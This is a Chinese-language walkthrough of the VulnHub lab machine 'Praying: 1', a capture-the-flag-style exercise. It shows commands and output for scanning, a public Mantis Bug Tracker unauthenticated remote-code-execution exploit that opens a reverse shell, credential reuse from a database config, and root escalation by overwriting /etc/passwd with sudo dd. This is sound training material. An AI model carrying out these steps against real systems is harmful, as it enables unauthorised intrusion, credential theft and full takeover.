Praying
作者:jason_huawen
目标主机基本信息
名称:Praying: 1
地址:
https://www.vulnhub.com/entry/praying-1,575/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Praying]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:be:bb:0d 1 60 PCS Systemtechnik GmbH
192.168.56.235 08:00:27:bd:7d:26 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.235
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.235 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 03:46 EST
Nmap scan report for bogon (192.168.56.235)
Host is up (0.00032s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8888/tcp closed sun-answerbook
MAC Address: 08:00:27:BD:7D:26 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.05 seconds
NMAP扫描结果表明目标主机有1个开放端口80(HTTP)
Get Access
访问80端口,返回apache的默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ nikto -h http://192.168.56.235
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.235
+ Target Hostname: 192.168.56.235
+ Target Port: 80
+ Start Time: 2022-11-28 03:50:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5b011df7fecbd, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Cookie MANTIS_STRING_COOKIE created without the httponly flag
+ /composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ 8725 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-11-28 03:51:41 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Nikto发现了/composer.json以及/composer.lock文件,下载到本地:
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ curl http://192.168.56.235/composer.json
{
"name": "mantisbt/mantisbt",
"description": "Mantis Bug Tracker",
"type": "project",
"require": {
"slim/slim": "^3.0"
},
"license": "GPL v2",
"authors": [
{
"name": "MantisBT Team",
"email": "[email protected]",
"homepage": "https://www.mantisbt.org"
}
]
}
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ gobuster dir -u http://192.168.56.235 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.235
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/28 03:54:21 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.235/images/]
/library (Status: 301) [Size: 318] [--> http://192.168.56.235/library/]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.235/doc/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.235/admin/]
/scripts (Status: 301) [Size: 318] [--> http://192.168.56.235/scripts/]
/plugins (Status: 301) [Size: 318] [--> http://192.168.56.235/plugins/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.235/css/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.235/core/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.235/js/]
/api (Status: 301) [Size: 314] [--> http://192.168.56.235/api/]
/lang (Status: 301) [Size: 315] [--> http://192.168.56.235/lang/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.235/vendor/]
/config (Status: 301) [Size: 317] [--> http://192.168.56.235/config/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.235/fonts/]
/server-status (Status: 403) [Size: 279]
Progress: 217630 / 220561 (98.67%)===============================================================
2022/11/28 03:54:52 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ gobuster dir -u http://192.168.56.235 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.235
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/28 03:56:14 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/images (Status: 301) [Size: 317] [--> http://192.168.56.235/images/]
/index.html (Status: 200) [Size: 10918]
/search.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=%2Fsearch.php]
/login.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?error=1&username=&return=my_view_page.php]
/library (Status: 301) [Size: 318] [--> http://192.168.56.235/library/]
/view.php (Status: 200) [Size: 4746]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.235/doc/]
/wiki.php (Status: 200) [Size: 4746]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.235/admin/]
/signup.php (Status: 200) [Size: 4808]
/scripts (Status: 301) [Size: 318] [--> http://192.168.56.235/scripts/]
/plugins (Status: 301) [Size: 318] [--> http://192.168.56.235/plugins/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.235/css/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.235/core/]
/core.php (Status: 200) [Size: 0]
/js (Status: 301) [Size: 313] [--> http://192.168.56.235/js/]
/api (Status: 301) [Size: 314] [--> http://192.168.56.235/api/]
/lang (Status: 301) [Size: 315] [--> http://192.168.56.235/lang/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.235/vendor/]
/config (Status: 301) [Size: 317] [--> http://192.168.56.235/config/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.235/fonts/]
/plugin.php (Status: 200) [Size: 4748]
/verify.php (Status: 200) [Size: 4832]
/main_page.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=main_page.php]
/news_rss.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=news_rss.php]
/mantis.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php]
/file_download.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=%2Ffile_download.php]
/xmlhttprequest.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=%2Fxmlhttprequest.php]
/login_page.php (Status: 200) [Size: 5565]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/bug_report.php (Status: 200) [Size: 4808]
/changelog_page.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=changelog_page.php]
/server-status (Status: 403) [Size: 279]
Progress: 1099799 / 1102805 (99.73%)===============================================================
2022/11/28 03:58:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ searchsploit mantis
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Mantis Bug Tracker 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution | php/webapps/21727.txt
Mantis Bug Tracker 0.19 - Remote Server-Side Script Execution | php/webapps/24390.txt
Mantis Bug Tracker 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion | php/webapps/26423.txt
Mantis Bug Tracker 0.x - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/24391.txt
Mantis Bug Tracker 0.x - New Account Signup Mass Emailing | php/webapps/24392.php
Mantis Bug Tracker 0.x/1.0 - 'manage_user_page.php?sort' Cross-Site Scripting | php/webapps/27229.txt
Mantis Bug Tracker 0.x/1.0 - 'view_all_set.php' Multiple Cross-Site Scripting Vulnerabiliti | php/webapps/27228.txt
Mantis Bug Tracker 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting | php/webapps/26798.txt
Mantis Bug Tracker 0.x/1.0 - Multiple Input Validation Vulnerabilities | php/webapps/26172.txt
Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forge | php/webapps/5657.txt
Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit) | php/remote/44611.rb
Mantis Bug Tracker 1.1.3 - Remote Code Execution | php/webapps/6768.txt
Mantis Bug Tracker 1.1.8 - Cross-Site Scripting / SQL Injection | php/webapps/36068.txt
Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit | multiple/webapps/41685.rb
Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit | php/remote/35283.rb
Mantis Bug Tracker 1.2.19 - Host Header | php/webapps/38068.txt
Mantis Bug Tracker 1.2.3 - 'db_type' Cross-Site Scripting / Full Path Disclosure | php/webapps/15735.txt
Mantis Bug Tracker 1.2.3 - 'db_type' Local File Inclusion | php/webapps/15736.txt
Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset | php/webapps/41890.txt
Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery | php/webapps/42043.txt
Mantis Bug Tracker 2.24.3 - 'access' SQL Injection | php/webapps/49340.py
Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated) | php/webapps/48818.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
选择最后一个漏洞利用代码:
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ searchsploit -m php/webapps/48818.py
Exploit: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
URL: https://www.exploit-db.com/exploits/48818
Path: /usr/share/exploitdb/exploits/php/webapps/48818.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Praying/48818.py
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ mv 48818.py exploit.py
修改exploit.py, 如下所示:
self.s = requests.Session()
self.headers = dict() # Initialize the headers dictionary
self.RHOST = "192.168.56.235" # Victim IP
self.RPORT = "80" # Victim port
self.LHOST = "192.168.56.206" # Attacker IP
self.LPORT = "5555" # Attacker Port
self.verify_user_id = "1" # User id for the target account
self.realname = "administrator" # Username to hijack
self.passwd = "password" # New password after account hijack
self.mantisLoc = "/" # Location of mantis in URL
运行exploit.py
──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ python2 exploit.py
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.235] 55214
bash: cannot set terminal process group (703): Inappropriate ioctl for device
bash: no job control in this shell
www-data@praying:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@praying:/var/www/html$
在Kali Linux得到了shell
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.235] 55214
bash: cannot set terminal process group (703): Inappropriate ioctl for device
bash: no job control in this shell
www-data@praying:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
提权
www-data@praying:/var/www/redmine/redmine-4.1.1/config$ cat database.yml
cat database.yml
# Default setup is given for MySQL 5.7.7 or later.
# Examples for PostgreSQL, SQLite3 and SQL Server can be found at the end.
# Line indentation must be 2 spaces (no tabs).
production:
adapter: mysql2
database: redmine
host: localhost
username: projman
password: "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
# Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
encoding: utf8mb4
development:
adapter: mysql2
database: redmine_development
host: localhost
username: root
password: ""
# Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
encoding: utf8mb4
# Warning: The database defined as "test" will be erased and
# re-generated from your development database when you run "rake".
# Do not set this db to the same as development or production.
test:
adapter: mysql2
database: redmine_test
host: localhost
username: root
password: ""
# Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
encoding: utf8mb4
# PostgreSQL configuration example
#production:
# adapter: postgresql
# database: redmine
# host: localhost
# username: postgres
# password: "postgres"
# SQLite3 configuration example
#production:
# adapter: sqlite3
# database: db/redmine.sqlite3
# SQL Server configuration example
#production:
# adapter: sqlserver
# database: redmine
# host: localhost
# username: jenkins
# password: jenkins
www-data@praying:/var/www/redmine/redmine-4.1.1/config$
www-data@praying:/var/www/redmine/redmine-4.1.1/config$ su projman
su projman
Password: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
id
uid=1002(projman) gid=1002(projman) groups=1002(projman)
找到了projman的密码,切换至该用户:
projman@praying:~$ ls -alh
ls -alh
total 36K
drwx------ 5 projman projman 4.0K Sep 26 2020 .
drwxr-xr-x 6 root root 4.0K Sep 24 2020 ..
lrwxrwxrwx 1 projman projman 9 Sep 24 2020 .bash_history -> /dev/null
-rw-r--r-- 1 projman projman 220 Sep 24 2020 .bash_logout
-rw-r--r-- 1 projman projman 3.7K Sep 24 2020 .bashrc
drwx------ 2 projman projman 4.0K Sep 24 2020 .cache
drwxrwxr-x 3 projman projman 4.0K Sep 24 2020 .local
-rw-r--r-- 1 projman projman 33 Sep 24 2020 .part1
-rw-r--r-- 1 projman projman 807 Sep 24 2020 .profile
drwx------ 2 projman projman 4.0K Sep 26 2020 .ssh
projman@praying:~$ cat .part1
cat .part1
4914CACB6C089C74AEAEB87497AF2FBA
projman@praying:~$
可能是某个用户的密码
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 4914CACB6C089C74AEAEB87497AF2FBA
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
用在线网站解密:tequieromucho
而我们知道目标主机一共有以下用户:
root
developer
elevate
mantis
projman
用解密得到后的密码尝试不同用户:
projman@praying:/home$ su - developer
su - developer
Password: tequieromucho
id
id
su: Authentication failure
projman@praying:/home$ id
uid=1002(projman) gid=1002(projman) groups=1002(projman)
projman@praying:/home$ su - elevate
su - elevate
Password: tequieromucho
elevate@praying:~$ id
id
uid=1003(elevate) gid=1003(elevate) groups=1003(elevate)
elevate@praying:~$
elevate@praying:~$ sudo -l
sudo -l
[sudo] password for elevate: tequieromucho
Matching Defaults entries for elevate on praying:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elevate may run the following commands on praying:
(ALL : ALL) /usr/bin/dd
elevate@praying:~$
利用dd进行提权,将/etc/passwd拷贝过来,然后将passwd中root的密码处(x)清空,但是用编辑器nano,或者vi会有乱码,用sed命令来编辑:
elevate@praying:~$ cp /etc/passwd passwd
cp /etc/passwd passwd
elevate@praying:~$ sed -i '1c root::0:0:root:/root:/bin/bash' passwd
sed -i '1c root::0:0:root:/root:/bin/bash' passwd
elevate@praying:~$ cat passwd
cat passwd
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mantis:x:1000:1000:praying:/home/mantis:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false
tinyproxy:x:113:119:Tinyproxy daemon:/run/tinyproxy:/bin/false
developer:x:1001:1001:,,,:/home/developer:/bin/bash
projman:x:1002:1002:,,,:/home/projman:/bin/bash
elevate:x:1003:1003:,,,:/home/elevate:/bin/bash
然后用dd命令写回/etc/passwd
elevate@praying:~$ sudo /usr/bin/dd if=passwd of=/etc/passwd
sudo /usr/bin/dd if=passwd of=/etc/passwd
[sudo] password for elevate: tequieromucho
3+1 records in
3+1 records out
2027 bytes (2.0 kB, 2.0 KiB) copied, 0.000190023 s, 10.7 MB/s
elevate@praying:~$ su - root
su - root
root@praying:~# cd /root
cd /root
root@praying:~# ls
ls
message part2 root.txt snap
root@praying:~# cat root.txt
cat root.txt
██▓███ ██▀███ ▄▄▄ ▓██ ██▓ ██▓ ███▄ █ ▄████
▓██░ ██▒▓██ ▒ ██▒████▄ ▒██ ██▒▓██▒ ██ ▀█ █ ██▒ ▀█▒
▓██░ ██▓▒▓██ ░▄█ ▒██ ▀█▄ ▒██ ██░▒██▒▓██ ▀█ ██▒▒██░▄▄▄░
▒██▄█▓▒ ▒▒██▀▀█▄ ░██▄▄▄▄██ ░ ▐██▓░░██░▓██▒ ▐▌██▒░▓█ ██▓
▒██▒ ░ ░░██▓ ▒██▒▓█ ▓██▒ ░ ██▒▓░░██░▒██░ ▓██░░▒▓███▀▒
▒▓▒░ ░ ░░ ▒▓ ░▒▓░▒▒ ▓▒█░ ██▒▒▒ ░▓ ░ ▒░ ▒ ▒ ░▒ ▒
░▒ ░ ░▒ ░ ▒░ ▒ ▒▒ ░▓██ ░▒░ ▒ ░░ ░░ ░ ▒░ ░ ░
░░ ░░ ░ ░ ▒ ▒ ▒ ░░ ▒ ░ ░ ░ ░ ░ ░ ░
░ ░ ░░ ░ ░ ░ ░
███▄ ▄███▓ ▄▄▄ ███▄ ░ █ ▄▄▄█████▓ ██▓ ██████
▓██▒▀█▀ ██▒▒████▄ ██ ▀█ █ ▓ ██▒ ▓▒▓██▒▒██ ▒
▓██ ▓██░▒██ ▀█▄ ▓██ ▀█ ██▒▒ ▓██░ ▒░▒██▒░ ▓██▄
▒██ ▒██ ░██▄▄▄▄██▓██▒ ▐▌██▒░ ▓██▓ ░ ░██░ ▒ ██▒
▒██▒ ░██▒ ▓█ ▓██▒██░ ▓██░ ▒██▒ ░ ░██░▒██████▒▒
░ ▒░ ░ ░ ▒▒ ▓▒█░ ▒░ ▒ ▒ ▒ ░░ ░▓ ▒ ▒▓▒ ▒ ░
░ ░ ░ ▒ ▒▒ ░ ░░ ░ ▒░ ░ ▒ ░░ ░▒ ░ ░
░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░
██▀███░ ▒█████ ░ ▒█████ ▄▄▄█████▓▓█████ ▓█████▄░ ▐██▌
▓██ ▒ ██▒▒██▒ ██▒▒██▒ ██▒▓ ██▒ ▓▒▓█ ▀ ▒██▀ ██▌ ▐██▌
▓██ ░▄█ ▒▒██░ ██▒▒██░ ██▒▒ ▓██░ ▒░▒███ ░██ █▌ ▐██▌
▒██▀▀█▄ ▒██ ██░▒██ ██░░ ▓██▓ ░ ▒▓█ ▄ ░▓█▄ ▌ ▓██▒
░██▓ ▒██▒░ ████▓▒░░ ████▓▒░ ▒██▒ ░ ░▒████▒░▒████▓ ▒▄▄
░ ▒▓ ░▒▓░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒ ░░ ░░ ▒░ ░ ▒▒▓ ▒ ░▀▀▒
░▒ ░ ▒░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░
░░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░
░
https://www.youtube.com/watch?v=T1XgFsitnQw
root@praying:~#
经验教训
-
事实上最开始选择的漏洞利用代码是正确的,但是需要修改代码以符合目标主机的情况,但是修改的不正确,导致代码执行失败。